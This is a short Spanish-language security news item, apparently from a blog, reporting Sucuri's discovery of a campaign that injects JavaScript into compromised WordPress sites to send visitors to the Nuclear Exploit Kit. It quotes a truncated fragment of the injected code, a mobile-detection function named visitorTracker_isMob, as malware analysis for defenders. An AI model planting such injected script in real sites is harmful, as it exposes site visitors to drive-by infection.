Nuevo ataque a WordPress: visitorTracker_isMob Malware


-- Descargar Nuevo ataque a WordPress: visitorTracker_isMob Malware como PDF --


El equipo de Sucuri, empresa dedicada a la seguridad de aplicaciones web, reportó a distintos medios su hallazgo:Un aumento considerable en el número de sitios web comprometidos, víctimas de «una campaña» global. Si bien aún no se ha confirmado los métodos utilizados para las intrusiones, se sabe el modus operandi una vez los atacantes logran acceso a los sitios. Todos los java scripts del sitio son alterados con código que redirige a los visitantes hacia una página que sirve un exploit muy popular y utilizado, Nuclear Exploit Kit. El código en el exploit se encarga de intentar distintos exploits para lograr la infección de las máquinas clientes de los visitantes

Entre el gran número de víctimas que ya ha cobrado esta campaña, Sucuri identificó a una firma de seguridad, Coverity.

Imagen 1
Sucuri detecto que Coverity fue uno de los afectados.

El código que se inyecta luego del compromiso es el siguiente:

function visitorTracker_isMob( ){
var ua = window.navigator.userAgent.toLowerCase();
if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|mi..|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc .. |vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(ua.substr(0,4))) {
return true;
return false;
} /* .. visitorTracker .. */ /*

Sucuri además ofrece su scanner gratuito online y recomienda que todos revisen su sitio inmediatamente.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *